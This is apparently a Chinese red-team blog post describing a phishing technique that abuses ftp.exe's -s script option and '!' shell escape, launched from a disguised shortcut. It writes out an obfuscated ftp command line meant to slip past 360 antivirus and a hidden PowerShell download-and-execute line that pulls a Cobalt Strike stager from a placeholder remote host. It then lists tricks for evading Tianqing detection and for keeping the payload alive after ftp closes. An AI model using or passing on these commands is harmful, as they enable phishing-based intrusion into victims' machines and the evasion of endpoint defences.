2020年7月

钓鱼之利用ftp命令搞事情

利用方法来自于去年红队会议中红雨滴分析的一个样本文件,当时只是记录了下,后来就一直没时间看,今天看To do的时候发现这个记录,就想办法把这个利用落地。

ftp -s

以前的抓鸡教程中经常会有用-s参数执行多条上传保存命令。

而ftp参数!可以执行系统命令。两个结合下就可以达到命令执行的效果。

ftp> ! 从ftp子系统退出到外壳

image-20200704194439258

创建一个快捷方式(参数混淆绕过360)

C:\Windows\System32\ftp.exe -""s:aaa.dll

image-20200704203547925

新建一个txt 文件名aaa.dll,内容是cs的powershell上线命令。

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).dow"nloa"dstring('http://xxxxxxx:802/a1111'))"

image-20200704201105355

image-20200704201132063

但是现在第三方调用powershell这种方法已经被360拦截。

看了下特征可以绕过天擎。

1、ftp执行参数混淆

2、第三方调用powershell不触发参数行为

3、点击最小化。

image-20200705014326462

图标问题可以查看我上次写的文章制作ICO,使用网络图片。

快捷方式图标下载执行exe

不过这种执行在任务栏会驻留。

image-20200705014500938

但是不用担心,ftp进程被关闭后,powershell还是会独立运行,他的父进程不是ftp

image-20200705014643978

image-20200705014703275

未知黑客团队钓鱼样本分析